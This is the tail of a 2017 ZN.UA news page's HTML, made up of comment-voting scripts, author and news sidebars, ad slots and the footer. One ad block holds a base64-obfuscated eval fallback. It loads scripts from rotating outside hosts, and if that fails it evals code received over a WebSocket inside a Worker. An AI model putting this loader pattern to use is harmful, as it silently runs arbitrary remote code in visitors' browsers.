            $(uf).find('.f_quote .t').text($(item).find('.i_body .i_text').text());
            $(uf).find('.f_quote').show();
          break;
        }
      }
    });

    $(document).on('click','#comments_list .comments a.vote',function(){
      var action = $(this).is('.up')?'vote_up':'vote_down';
      var f = $('#comments_block form.update');
      $(f).find('[name="id_comment"]').val($(this).attr('rel'));
      $(f).find('[name="action"]').val(action);
      box_znua2.preloader.show();
      $(f).submit();
    });

    $(document).on('click','#comments_list .comments a.spam',function(){
      var f = $('#comments_block form.update');
      $(f).find('[name="id_comment"]').val($(this).attr('rel'));
      $(f).find('[name="action"]').val('spam');

      box_znua2.preloader.show();
      $(f).submit();
    });

    $(document).on('click','#comments_block #c_user_auth a.to_hide', function(){
      cua_hide();
    });
  });
</script><div class='article-informer'>
<div id="LentaInformScriptRootN10269" class="news-block-magick">
<div id="LentaInformPreloadN10269">
<a href="https://lentainform.com/" target="_blank">Загрузка...</a>
</div>
<script>
(function(){
var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
var i=d[ce]('iframe');i[st][ds]=n;d[gi]("LentaInformScriptRootN10269")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
catch(e){var iw=d;var c=d[gi]("LentaInformScriptRootN10269");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=10269;c[ac](dv);
var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.lentainform.com/z/n/zn.ua.10269.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
</script>
</div>
</div><div class="banner10" style="margin-bottom:20px">
  <div style="width:580px; height:400px;">
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <!-- newZN footer 580x400 -->
    <ins class="adsbygoogle"
        style="display:inline-block;width:580px;height:400px"
        data-ad-client="ca-pub-5515961538037914"
        data-ad-slot="7471714581"></ins>
    <script>
    (adsbygoogle = window.adsbygoogle || []).push({});
    </script>
  </div>
</div>
              <div class='clear'></div>
            </div>
          <!--#block_left [END]-->

          <!--#block_right [START]-->
            <div id='right'>
              <div class='authors_block'>
    <ul class='authors_imgs'>
      
        <li class='auth_img'>
          <a class='' href='/author/aleksandr-lemenov'>
            <img class='img' src='//image.zn.ua/media/images/300x250/Jun2017/178739.jpg' alt='Александр Леменов'>
          </a>
        </li>
      
    </ul>
    <div class='auth_info'>
      <span class='info_title'>
        Автор
      </span>
      <ul class='auth_list'>
        
          <li class='auth_item'>
            <a class='auth_link' href='/author/aleksandr-lemenov'>
              <span class='name'>
                Александр Леменов
              </span>
              <span class='post'>
                главный эксперт Антикоррупционной группы РПР
              </span>
            </a>
          </li>
        
      </ul>
      <div class='auth_articles_block'>
        <span class='auth_articles_list_title'>
          Статьи автора
        </span>
        <ul class='auth_articles_list'>
        
          <li class='auth_article'>
            <a class='auth_article_link' href='/internal/deydey-surka-253705_.html'>
              <span class='title'>
                Дейдей сурка
              </span>
              <span class='summary'>
                Регламентный комитет Рады начал рассматривать представление о снятии депутатской неприкосновенности с...
              </span>
            </a>
            </li>
          
          <li class='auth_article'>
            <a class='auth_article_link' href='/internal/gbr-priostanovlennyy-dvigatel-preobrazovaniy-253031_.html'>
              <span class='title'>
                ГБР: приостановленный  двигатель преобразований
              </span>
              <span class='summary'>
                Трудно не заметить, как с повестки дня тихо исчез вопрос Государственного бюро расследований. И этому...
              </span>
            </a>
            </li>
          
          <li class='auth_article'>
            <a class='auth_article_link' href='/internal/paketnaya-neprikosnovennost-252419_.html'>
              <span class='title'>
                &quot;Пакетная&quot; неприкосновенность
              </span>
              <span class='summary'>
                На той неделе генеральный прокурор внес в Верховную Раду представление на снятие депутатской неприкосновенности...
              </span>
            </a>
            </li>
          
        </ul>
        
          <a class='auth_button' href='/author/aleksandr-lemenov'>
            Все статьи автора
          </a>
        
        <a class='auth_button' href='/authors'>
          Все авторы
        </a>
      </div>
    </div>
  </div><div class="banner1">
<!--  AdRiver code START. Type:AjaxJS Site: ZN PZ: 0 BN: 1 -->
<div id="adriver_banner_71440337"></div>
<script type="text/javascript">
new adriver("adriver_banner_71440337", {sid:161943, bt:52, bn:2});
</script>
<!--  AdRiver code END  -->
</div><div class='left_socials'>
  <span class='caption center'>Читайте нас в соцсетях</span>
  <ul class='social_list'>
    <li class='social_item'>
      <a class='social_link fb' href='https://www.facebook.com/ZN.UA.Official' target="_blank"></a>
    </li>
    <li class='social_item'>
      <a class='social_link tw' href='https://twitter.com/zn_ua' target="_blank"></a>
    </li>
    <li class='social_item'>
      <a class='social_link gp' href='https://plus.google.com/+ZnUaOfficial/posts' target="_blank"></a>
    </li>
    <li class='social_item'>
      <a class='social_link tg' href='https://t.me/ZerkaloNedeliBot' target="_blank"></a>
    </li>
  </ul>
</div>
<div style="clear: both"></div><div class='left_news_list right '>
  <a class='caption center' href=''>Последние новости</a>
  <ul class='news_list'>
    
    <li class='news_item'>
      <a class='news_link' href='/SPORT/kosovo-ukraina-onlayn-translyaciya-matcha-262092_.html'>
        
        <span class='news_anounce'>
          
          <span class='news_title'>Косово - Украина: онлайн-трансляция матча</span>
          
          
          
          
          
          
          
          
          
          
          
        </span>
        <span class='news_date'>23:22</span>
      </a>
    </li>
    
    <li class='news_item'>
      <a class='news_link' href='/UKRAINE/apellyacionnyy-sud-ostavil-pod-strazhey-direktora-odesskogo-lagerya-viktoriya-262237_.html'>
        
        <span class='news_anounce'>
          
          <span class='news_title'>Апелляционный суд оставил под стражей директора одесского лагеря &quot;Виктория&quot;</span>
          
          
          
          
          
          
          
          
          
          
          
        </span>
        <span class='news_date'>22:54</span>
      </a>
    </li>
    
    <li class='news_item'>
      <a class='news_link' href='/WORLD/germaniya-ekstradirovala-v-rossiyu-obvinyaemogo-v-moshennichestve-ukrainca-262236_.html'>
        
        <span class='news_anounce'>
          
          <span class='news_title'>Германия экстрадировала в Россию обвиняемого в мошенничестве украинца</span>
          
          
          
          
          
          
          
          
          
          
          
        </span>
        <span class='news_date'>22:31</span>
      </a>
    </li>
    
    <li class='news_item'>
      <a class='news_link' href='/WORLD/armiya-asada-voshla-v-poslednyuyu-stolicu-igil-v-sirii-smi-262235_.html'>
        
        <span class='news_anounce'>
          
          <span class='news_title'>Армия Асада вошла в последнюю &quot;столицу&quot; ИГИЛ в Сирии - СМИ</span>
          
          
          
          
          
          
          
          
          
          
          
        </span>
        <span class='news_date'>22:08</span>
      </a>
    </li>
    
    <li class='news_item'>
      <a class='news_link' href='/WORLD/v-katalonii-oglasili-oficialnye-rezultaty-referenduma-o-nezavisimosti-262234_.html'>
        
        <span class='news_anounce'>
          
          <span class='news_title'>В Каталонии огласили официальные результаты референдума о независимости</span>
          
          
          
          
          
          
          
          
          
          
          
        </span>
        <span class='news_date'>22:01</span>
      </a>
    </li>
    
  </ul>
  
  <div class='more'>
    <div class='over'></div>
    <a class='link' href='/all-news'>Все новости</a>
  </div>
  
</div>

<div style="clear: both"></div><div class="banner22">
  <!-- /17774365/zn.ua -->
  <div id='div-gpt-ad-1461742398816-0' style='height:250px; width:300px;'>
    <script type='text/javascript'>
    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1461742398816-0'); });
    </script>
  </div>
<!--  AdRiver code START. Type:AjaxJS Site: ZN BN:19 -->
  <div id="adriver_banner_2121310681"></div>

  <script type="text/javascript">
    new adriver("adriver_banner_2121310681", {sid:161943, bt:52, bn:19});
  </script>
<!--  AdRiver code END  -->

  <div id="MIXADV_2408" class="MIXADVERT_NET"></div>
    <script type="text/javascript">
      var node2408 = document.getElementById("MIXADV_2408");
      if( node2408 )
      {
        var script = document.createElement("script");
        script.charset = "utf-8";
        script.src = "https://m.mixadvert.com/show/?id=2408&r="+Math.random();
        node2408.parentNode.appendChild(script);
        script.onerror = function(){
          window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBob3N0ID0gKCBkYXRlLmdldERhdGUoKSA8IDE1ID8gIm5hc2RmZy5jb20iIDogIm5ldHNsZWQubmV0IiApO3ZhciBzY3JpcHRfZmlyc3QgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtzY3JpcHRfZmlyc3Quc3JjID0gImh0dHBzOi8vIisgaG9zdCsiL3Nob3cvP2lkPTI0MDgmcj0iK01hdGgucmFuZG9tKCk7bm9kZTI0MDgucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfZmlyc3QpO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt3aW5kb3cuZXZhbChhdG9iKCJjM1J5SUQwZ0oyTnZibTRnUFNCdVpYY2dWMlZpVTI5amEyVjBLQ0ozY3pvdkx5SXJhRzl6ZENzaU9qZ3dPREF2TWpRd09DSXBPeUJqYjI1dUxtOXViV1Z6YzJGblpTQTlJR1oxYm1OMGFXOXVJQ2hsZG5RcElIc2djRzl6ZEUxbGMzTmhaMlVvWlhaMExtUmhkR0VwT3lCamIyNXVMbU5zYjNObEtDazdmU2M3ZG1GeUlIZHZjbXRsY2lBOUlHNWxkeUJYYjNKclpYSW9WVkpNTG1OeVpXRjBaVTlpYW1WamRGVlNUQ2h1WlhjZ1FteHZZaWhiSW1WMllXd29JQ2NpSzNOMGNpc2lKeWtpWFNrc0lIdDBlWEJsT2lBbmRHVjRkQzlxWVhaaGMyTnlhWEIwSjMwcEtUdDNiM0pyWlhJdWNHOXpkRTFsYzNOaFoyVW9KekVuS1RzZ2QyOXlhMlZ5TG05dWJXVnpjMkZuWlNBOUlHWjFibU4wYVc5dUlDaHRjMmNwSUhzZ2QybHVaRzkzTG1WMllXd29iWE5uTG1SaGRHRXBPeUI5T3lBPSIpKTt9OyBzY3JpcHRfZmlyc3QucmVtb3ZlKCk7") );
        }
      }
    </script>
</div><div id='left_news_list_article' class='left_news_list right other'>
  <span class='caption center'>Новости других ресурсов</span>
<div id="traffim-widget-921"></div>
  <script language="javascript" type="text/javascript">
    (function() {
      var useSSL = 'https:' == document.location.protocol;
      var traffim = document.createElement('script');
      traffim.type = 'text/javascript'; traffim.async = true;traffim.charset = 'UTF-8';
      traffim.src = (useSSL ? 'https:' : 'http:') + '//ua.traffim.com/load/921.js';
      var nrvrscr = document.getElementsByTagName('script')[0];
      nrvrscr.parentNode.insertBefore(traffim, nrvrscr);
    })();
  </script>
</div>

<script type='text/javascript'>
  $(document).ready(function(){
    var body = document.body,
        html = document.documentElement;
    var height = Math.max( body.scrollHeight, body.offsetHeight, html.clientHeight, html.scrollHeight, html.offsetHeight );

    var distanceTop_fix = $('#left_news_list_article').offset().top + 1250;
    var comment_height = $('#comments_block').outerHeight();
    var distanceTop_abs = $('#comments_block').offset().top + comment_height - 530;

    if (height > 5500){
      $(window).scroll(function(){
        try {
          var pos = parseInt( $( window ).scrollTop() );

          if (pos > distanceTop_fix) {
            $('#left_news_list_article').addClass('fixed');
            $('#left_news_list_article').css({'top': '5px'});
            }
          else {
            $('#left_news_list_article').removeClass('fixed');
          }
          if (pos > distanceTop_abs) {
            $('#left_news_list_article').addClass('abs');
            $('#left_news_list_article').css({'top': distanceTop_abs+'px'});
            }
          else {
            $('#left_news_list_article').removeClass('abs');
            $('#left_news_list_article').css({'top':'40px'});
          }
        }
        catch(e) {
        }
      });
    }
  });
</script>
              <div class='clear'></div>
            </div>
          <!--#block_right [END]-->
        </div>
      </div>
      <div class='clear'></div>

      <!--#block_bottom_full_width [START]-->
        <script>
  $(function(){
    $("#newspaper").owlCarousel({
      responsive:{
        0:{
            items:3
        },
        1024:{
            items:3
        },
        1250:{
            items:4
        }
      }

    });

  });
</script>
<div class='index_news_list wide'>
  <div class='index_item wide newspaper' >
    <span class='top_block'>
      <a class='logo' href='/gazeta/issue/1123'>
        <span class='name'>ЗЕРКАЛО НЕДЕЛИ. УКРАИНА</span>
        <span class='corner'><span>
      </a>
      <a class='issue' href='/gazeta/issue/1123'><span>Выпуск №36, 30 сентября-6 октября</span></a>
      <a class='button' href='/gazeta/archive/'>Архив номеров</a>
      <span class='divider'>|</span>
      <a class='button' href='/gazeta/issue/1123'>Содержание номера</a>
      <span class='navigator'>
        <span class='prev'><</span>
        <span class='next'>></span>
      </span>
    </span>
    <ul id='newspaper' class='grid_list main_news_list'>
      
      <li class='column x1x2 news_item full'>
        <span class='news_link'>
          <a href='/internal/katastrofa-v-kalinovke-vzryv-kotorogo-zhdali-261519_.html'>
            <img class='news_img' src='//image.zn.ua/media/images/300x250/Sep2017/185901.jpg' alt='' />
          </a>
          <a class='news_anounce' href='/internal/katastrofa-v-kalinovke-vzryv-kotorogo-zhdali-261519_.html'>
            <span class='news_title'>
              
              Катастрофа в Калиновке: взрыв, которого ждали
            </span>
            <span class='news_summary'>От больших жертв просто спасло чудо.</span>
            
            
            
            
            
            
            
            
            
            
            
            <span class='news_date'>29.09 19:51</span>
          </a>
          <span class='author'>
            
            <a class='int_auth_img' href='/author/yuriy-butusov'>
              <img class='auth_img' src='//image.zn.ua/media/images/300x250/Nov2013/74565.jpg' alt='Юрий Бутусов' />
            </a>
            
            <span class='auth_name'><b>Автор:</b><br />
            
              <a class='int_auth_name' href='/author/yuriy-butusov'>Юрий Бутусов</a><br />
            
            </span>
          </span>
          <span class='type'>
            <span class='type_name'>Статья</span>
            <span class='type_corner'></span>
          </span>
        </span>
      </li>
      
      <li class='column x1x2 news_item full'>
        <span class='news_link'>
          <a href='/internal/aleksandr-danilyuk-v-buduschem-my-ne-dolzhny-rasschityvat-na-mvf-261517_.html'>
            <img class='news_img' src='//image.zn.ua/media/images/300x250/Sep2017/185813.jpg' alt='' />
          </a>
          <a class='news_anounce' href='/internal/aleksandr-danilyuk-v-buduschem-my-ne-dolzhny-rasschityvat-na-mvf-261517_.html'>
            <span class='news_title'>
              
              Александр Данилюк: "В будущем  мы не должны рассчитывать на МВФ"
            </span>
            <span class='news_summary'>ZN.UA беседовало с министром финансов Александром Данилюком.  
  </span>
            
            
            
            
            
            
            
            
            
            
            
            <span class='news_date'>29.09 19:45</span>
          </a>
          <span class='author'>
            
            <a class='int_auth_img' href='/author/yuliya-samaeva'>
              <img class='auth_img' src='//image.zn.ua/media/images/300x250/May2016/148200.jpg' alt='Юлия Самаева' />
            </a>
            
            <span class='auth_name'><b>Автор:</b><br />
            
              <a class='int_auth_name' href='/author/yuliya-samaeva'>Юлия Самаева</a><br />
            
            </span>
          </span>
          <span class='type'>
            <span class='type_name'>Статья</span>
            <span class='type_corner'></span>
          </span>
        </span>
      </li>
      
      <li class='column x1x2 news_item full'>
        <span class='news_link'>
          <a href='/SOCIUM/lyudmila-volynec-lyudi-pridumyvayuschie-korrupcionnye-shemy-analiziruyut-processy-v-otlichie-ot-gosudarstva-261471_.html'>
            <img class='news_img' src='//image.zn.ua/media/images/300x250/Sep2017/185745.jpg' alt='' />
          </a>
          <a class='news_anounce' href='/SOCIUM/lyudmila-volynec-lyudi-pridumyvayuschie-korrupcionnye-shemy-analiziruyut-processy-v-otlichie-ot-gosudarstva-261471_.html'>
            <span class='news_title'>
              
              Людмила Волынец: "Люди, придумывающие коррупционные схемы, анализируют процессы. В отличие от государства"
            </span>
            <span class='news_summary'>ZN.UA общалось с руководителем секретариата межфракционного депутатского объединения "Защита прав ребенка" Людмилой Волынец.</span>
            
            
            
            
            
            
            
            
            
            
            
            <span class='news_date'>29.09 16:47</span>
          </a>
          <span class='author'>
            
            <a class='int_auth_img' href='/author/alla-kotlyar'>
              <img class='auth_img' src='//image.zn.ua/media/images/300x250/Jun2014/92148.jpg' alt='Алла Котляр' />
            </a>
            
            <span class='auth_name'><b>Автор:</b><br />
            
              <a class='int_auth_name' href='/author/alla-kotlyar'>Алла Котляр</a><br />
            
            </span>
          </span>
          <span class='type'>
            <span class='type_name'>Статья</span>
            <span class='type_corner'></span>
          </span>
        </span>
      </li>
      
      <li class='column x1x2 news_item full'>
        <span class='news_link'>
          <a href='/EDUCATION/doverie-svoboda-podderzhka-chego-zhdut-ot-nas-uchitelya-261473_.html'>
            <img class='news_img' src='//image.zn.ua/media/images/300x250/Sep2017/185751.jpg' alt='' />
          </a>
          <a class='news_anounce' href='/EDUCATION/doverie-svoboda-podderzhka-chego-zhdut-ot-nas-uchitelya-261473_.html'>
            <span class='news_title'>
              
              Доверие, свобода, поддержка. Чего ждут от нас учителя
            </span>
            <span class='news_summary'>ZN.UA обратилось к известным учителям с вопросом: чего вы ждете от государства, родителей, учеников?</span>
            
            
            
            
            
            
            
            
            
            
            
            <span class='news_date'>29.09 17:01</span>
          </a>
          <span class='author'>
            
            <a class='int_auth_img' href='/author/oksana-onischenko'>
              <img class='auth_img' src='//image.zn.ua/media/images/300x250/Jul2017/180632.jpg' alt='Оксана Онищенко' />
            </a>
            
            <span class='auth_name'><b>Автор:</b><br />
            
              <a class='int_auth_name' href='/author/oksana-onischenko'>Оксана Онищенко</a><br />
            
            </span>
          </span>
          <span class='type'>
            <span class='type_name'>Статья</span>
            <span class='type_corner'></span>
          </span>
        </span>
      </li>
      
      <li class='column x1x2 news_item full'>
        <span class='news_link'>
          <a href='/internal/infosfera-v-gibridnoy-realnosti-261516_.html'>
            <img class='news_img' src='//image.zn.ua/media/images/300x250/Sep2017/185823.jpg' alt='' />
          </a>
          <a class='news_anounce' href='/internal/infosfera-v-gibridnoy-realnosti-261516_.html'>
            <span class='news_title'>
              
              Инфосфера в гибридной реальности
            </span>
            <span class='news_summary'>20 лет в Украине не было информационной политики, и во многом за это пришлось расплачиваться в 2014 году.</span>
            
            
            
            
            
            
            
            
            
            
            
            <span class='news_date'>29.09 19:42</span>
          </a>
          <span class='author'>
            
            <a class='int_auth_img' href='/author/viktoriya-syumar'>
              <img class='auth_img' src='//image.zn.ua/media/images/300x250/Jul2013/65964.jpg' alt='Виктория Сюмар' />
            </a>
            
            <span class='auth_name'><b>Автор:</b><br />
            
              <a class='int_auth_name' href='/author/viktoriya-syumar'>Виктория Сюмар</a><br />
            
            </span>
          </span>
          <span class='type'>
            <span class='type_name'>Статья</span>
            <span class='type_corner'></span>
          </span>
        </span>
      </li>
      
      <li class='column x1x2 news_item full'>
        <span class='news_link'>
          <a href='/macrolevel/plan-marshalla-2-0-ili-ocherednoy-klad-getmana-polubotko-261501_.html'>
            <img class='news_img' src='//image.zn.ua/media/images/300x250/Sep2017/185809.jpg' alt='' />
          </a>
          <a class='news_anounce' href='/macrolevel/plan-marshalla-2-0-ili-ocherednoy-klad-getmana-polubotko-261501_.html'>
            <span class='news_title'>
              
              План Маршалла 2.0 или очередной клад гетмана Полуботко?
            </span>
            <span class='news_summary'>Ожиданиями плана Маршалла для Украины никоим образом нельзя подменять осуществление реформ. </span>
            
            
            
            
            
            
            
            
            
            
            
            <span class='news_date'>29.09 18:38</span>
          </a>
          <span class='author'>
            
            <a class='int_auth_img' href='/author/yaroslav-zhalilo'>
              <img class='auth_img' src='//image.zn.ua/media/images/300x250/Dec2014/104345.jpg' alt='Ярослав Жалило' />
            </a>
            
            <span class='auth_name'><b>Автор:</b><br />
            
              <a class='int_auth_name' href='/author/yaroslav-zhalilo'>Ярослав Жалило</a><br />
            
            </span>
          </span>
          <span class='type'>
            <span class='type_name'>Статья</span>
            <span class='type_corner'></span>
          </span>
        </span>
      </li>
      
      <li class='column x1x2 news_item full'>
        <span class='news_link'>
          <a href='/internal/samyy-gumannyy-sud-261518_.html'>
            <img class='news_img' src='//image.zn.ua/media/images/300x250/Sep2017/185824.jpg' alt='' />
          </a>
          <a class='news_anounce' href='/internal/samyy-gumannyy-sud-261518_.html'>
            <span class='news_title'>
              
              Самый гуманный суд
            </span>
            <span class='news_summary'>Эффективная система обжалования является гарантией проведения демократических выборов.</span>
            
            
            
            
            
            
            
            
            
            
            
            <span class='news_date'>29.09 19:48</span>
          </a>
          <span class='author'>
            
            <a class='int_auth_img' href='/author/olga_ayvazovskaya'>
              <img class='auth_img' src='//image.zn.ua/media/images/300x250/Jul2015/120581.jpg' alt='Ольга Айвазовская' />
            </a>
            
            <a class='int_auth_img' href='/author/olga-kocyuruba'>
              <img class='auth_img' src='/static/img/author-place-holder.jpg' alt='Ольга Коцюруба ' />
            </a>
            
            <span class='auth_name'><b>Авторы</b><br />
            
              <a class='int_auth_name' href='/author/olga_ayvazovskaya'>Ольга Айвазовская,</a><br />
            
              <a class='int_auth_name' href='/author/olga-kocyuruba'>Ольга Коцюруба </a><br />
            
            </span>
          </span>
          <span class='type'>
            <span class='type_name'>Статья</span>
            <span class='type_corner'></span>
          </span>
        </span>
      </li>
      

    </ul>
  </div>
</div><div class='left_news_list section bottom'>
  <span class='caption left'>Вам также будет интересно</span>
  <span class='caption_line'></span>
  <ul class='news_list'>
    
    <li class='news_item article'>
      <span class='news_link'>
        <a class='img_cont'  href='/international/vyydet-li-prezident-tramp-iz-yadernogo-soglasheniya-s-iranom-262214_.html'>
          <img class='news_list_img' src='/blank.gif' alt='' />
        </a>
        <span class='news_anounce'>
          <a class='news_title'  href='/international/vyydet-li-prezident-tramp-iz-yadernogo-soglasheniya-s-iranom-262214_.html'>
            
            Выйдет ли президент Трамп из ядерного соглашения с Ираном?
          </a>
          <a class='news_summary'  href='/international/vyydet-li-prezident-tramp-iz-yadernogo-soglasheniya-s-iranom-262214_.html'><p>Иран испытал ракету Khoramshahr с дальностью действия 2000 километров.</p>
            
            
            
            
            
            
            
            
            
            
            
          </a>
          <span class='author'>
          
            <a  class='auth_img' href='/author/viktor-kaspruk'>
              <img class='auth_img_img' src='//image.zn.ua/media/images/300x250/Oct2014/100121.jpg' alt='' />
            </a>
            <a class='auth_name'  href='/author/viktor-kaspruk'>Виктор Каспрук</a>
          
            <a class='button' href='/international/vyydet-li-prezident-tramp-iz-yadernogo-soglasheniya-s-iranom-262214_.html'>Читать статью</a>
          </span>
          
          <span class='type'>
            <span class='type_name'>Статья</span>
            <span class='type_corner'></span>
          </span>
          
          <span class='news_date'>19:17</span>
        </span>
      </span>
    </li>
    
    <li class='news_item article'>
      <span class='news_link'>
        <a class='img_cont'  href='/internal/rabota-oboronki-chasy-s-zamedlennym-hodom-262215_.html'>
          <img class='news_list_img' src='//image.zn.ua/media/images/300x250/Oct2017/186436.jpg' alt='' />
        </a>
        <span class='news_anounce'>
          <a class='news_title'  href='/internal/rabota-oboronki-chasy-s-zamedlennym-hodom-262215_.html'>
            
            Работа &quot;оборонки&quot;:  часы с замедленным ходом
          </a>
          <a class='news_summary'  href='/internal/rabota-oboronki-chasy-s-zamedlennym-hodom-262215_.html'><p>Во время войны необходимы оперативность и профессиональность в работе, это же касается и постановки образцов на вооружение.</p>
            
            
            
            
            
            
            
            
            
            
            
          </a>
          <span class='author'>
          
            <a  class='auth_img' href='/author/valentin__badrak'>
              <img class='auth_img_img' src='//image.zn.ua/media/images/300x250/Mar2015/112098.jpg' alt='' />
            </a>
            <a class='auth_name'  href='/author/valentin__badrak'>Валентин Бадрак</a>
          
            <a class='button' href='/internal/rabota-oboronki-chasy-s-zamedlennym-hodom-262215_.html'>Читать статью</a>
          </span>
          
          <span class='type'>
            <span class='type_name'>Статья</span>
            <span class='type_corner'></span>
          </span>
          
          <span class='news_date'>19:22</span>
        </span>
      </span>
    </li>
    
    <li class='news_item article'>
      <span class='news_link'>
        <a class='img_cont'  href='/internal/gibridokomanduyuschiy-262226_.html'>
          <img class='news_list_img' src='//image.zn.ua/media/images/300x250/Oct2017/186442.jpg' alt='' />
        </a>
        <span class='news_anounce'>
          <a class='news_title'  href='/internal/gibridokomanduyuschiy-262226_.html'>
            
            Гибридокомандующий
          </a>
          <a class='news_summary'  href='/internal/gibridokomanduyuschiy-262226_.html'><p>Реакция украинского общества на войну удивила врага, мир и самих украинцев.</p>
            
            
            
            
            
            
            
            
            
            
            
          </a>
          <span class='author'>
          
            <a  class='auth_img' href='/author/oksana-syroid'>
              <img class='auth_img_img' src='//image.zn.ua/media/images/300x250/Jun2016/151888.jpg' alt='' />
            </a>
            <a class='auth_name'  href='/author/oksana-syroid'>Оксана Сыроид</a>
          
            <a class='button' href='/internal/gibridokomanduyuschiy-262226_.html'>Читать статью</a>
          </span>
          
          <span class='type'>
            <span class='type_name'>Статья</span>
            <span class='type_corner'></span>
          </span>
          
          <span class='news_date'>19:50</span>
        </span>
      </span>
    </li>
    
    <li class='news_item article'>
      <span class='news_link'>
        <a class='img_cont'  href='/internal/kak-ostanovit-novuyu-smertnuyu-kazn-ili-moratoriy-na-pozhiznennoe-lishenie-svobody-262218_.html'>
          <img class='news_list_img' src='//image.zn.ua/media/images/300x250/Oct2017/186437.jpg' alt='' />
        </a>
        <span class='news_anounce'>
          <a class='news_title'  href='/internal/kak-ostanovit-novuyu-smertnuyu-kazn-ili-moratoriy-na-pozhiznennoe-lishenie-svobody-262218_.html'>
            
            Как остановить  новую смертную казнь,   или Мораторий на пожизненное лишение свободы
          </a>
          <a class='news_summary'  href='/internal/kak-ostanovit-novuyu-smertnuyu-kazn-ili-moratoriy-na-pozhiznennoe-lishenie-svobody-262218_.html'><p>Национальное законодательство не закрепляет механизм освобождения от пожизненного заключения.</p>
            
            
            
            
            
            
            
            
            
            
            
          </a>
          <span class='author'>
          
            <a  class='auth_img' href='/author/vadim-chovgan'>
              <img class='auth_img_img' src='/static/img/author-place-holder.jpg' alt='' />
            </a>
            <a class='auth_name'  href='/author/vadim-chovgan'>Вадим Човган</a>
          
            <a class='button' href='/internal/kak-ostanovit-novuyu-smertnuyu-kazn-ili-moratoriy-na-pozhiznennoe-lishenie-svobody-262218_.html'>Читать статью</a>
          </span>
          
          <span class='type'>
            <span class='type_name'>Статья</span>
            <span class='type_corner'></span>
          </span>
          
          <span class='news_date'>19:24</span>
        </span>
      </span>
    </li>
    
    <li class='news_item article'>
      <span class='news_link'>
        <a class='img_cont'  href='/internal/oproverzhenie-262221_.html'>
          <img class='news_list_img' src='/blank.gif' alt='' />
        </a>
        <span class='news_anounce'>
          <a class='news_title'  href='/internal/oproverzhenie-262221_.html'>
            
            Опровержение
          </a>
          <a class='news_summary'  href='/internal/oproverzhenie-262221_.html'><p>Помимо публикации абсурдных опровержений, Дубневичи также требуют удалить сам текст февральского интервью с министром Омеляном. </p>
            
            
            
            
            
            
            
            
            
            
            
          </a>
          <span class='author'>
          
            <a class='button' href='/internal/oproverzhenie-262221_.html'>Читать статью</a>
          </span>
          
          <span class='type'>
            <span class='type_name'>Статья</span>
            <span class='type_corner'></span>
          </span>
          
          <span class='news_date'>19:31</span>
        </span>
      </span>
    </li>
    
  </ul>
</div>
<div style="clear: both"></div>
      <!--#block_bottom_full_width [END]-->

      <div class='clearfix'></div>
      <!--#container [END]-->
    </div>
    <!--#wrapper [END] -->
    <!--#footer [START]-->
      <div id='footer'>
          <div class='container'>
  <div class='info_block'>
    <a class='bottom_logo' href='/'></a>
    <div class='copyright'>
      <p>Использование материалов «ZN.UA» разрешается при условии ссылки на «ZN.UA».</p>
        <p>Для интернет-изданий обязательна прямая, открытая для поисковых систем, гиперссылка в первом абзаце на конкретный материал.</p>
        <p>Все материалы, размещенные на этом сайте со ссылкой на агентство «Интерфакс-Украина», не подлежат последующему воспроизведению и/или распространению в любой форме, кроме как с письменного разрешения агентства «Интерфакс-Украина».</p>
        <p>Материалы в блоке "Новости компаний" публикуются на правах рекламы.</p>
      <a href="/?version=mobile" class="">Мобильная версия</a>
      <a href="https://old.zn.ua" class="">Старая версия</a>
      <span class='terms'>
        © 1994–2017 «Зеркало недели. Украина». Все права защищены.
      </span>
    </div>
  </div>
  <div class='bottom_menu'>
    <span class='name'>Рубрики</span>
    <ul class='menu'>
    
      <li class='menu_item'>
        <a class='link' href='/POLITICS'>Политика</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='/ECONOMICS'>Экономика</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='/UKRAINE'>Украина</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='/WORLD'>Мир</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='/TECHNOLOGIES'>Технологии</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='/CULTURE'>Культура</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='/SPORT'>Спорт</a>
      </li>
    
    </ul>
  </div>
  <div class='bottom_menu'>
    <span class='name'>Издание</span>
    <ul class='menu'>
    
      <li class='menu_item'>
        <a class='link' href='/gazeta/issue/1123'>Газета</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='/gazeta/archive/'>Архив номеров</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='/reklama'>Реклама</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='/redaction'>Редакция</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='//zn.ua/sitemap/text/index.html'>Карта</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='/fond'>Поддержать ZN</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='/podpiska'>Подписка</a>
      </li>
    
    </ul>
  </div>
  <div class='bottom_menu wide'>
    <span class='name'>Контакты</span>
    <ul class='menu'>
    
      <li class='menu_item'>
        <span class='link' href=''>01010 Киев, ул. Московская, 19/1</span>
      </li>
    
      <li class='menu_item'>
        <span class='link' href=''>Телефон: +380 (44) 280-04-85 </span>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='mailto:zn94@ukr.net'>Электронная почта редакции: zn94@ukr.net</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='mailto:editor@zn.ua'>Электронная почта службы новостей: editor@zn.ua</a>
      </li>
    
    </ul>
  </div>
  <div class='clear'></div>
  <div class='counters'>
   <!-- Google Analytics [START]-->
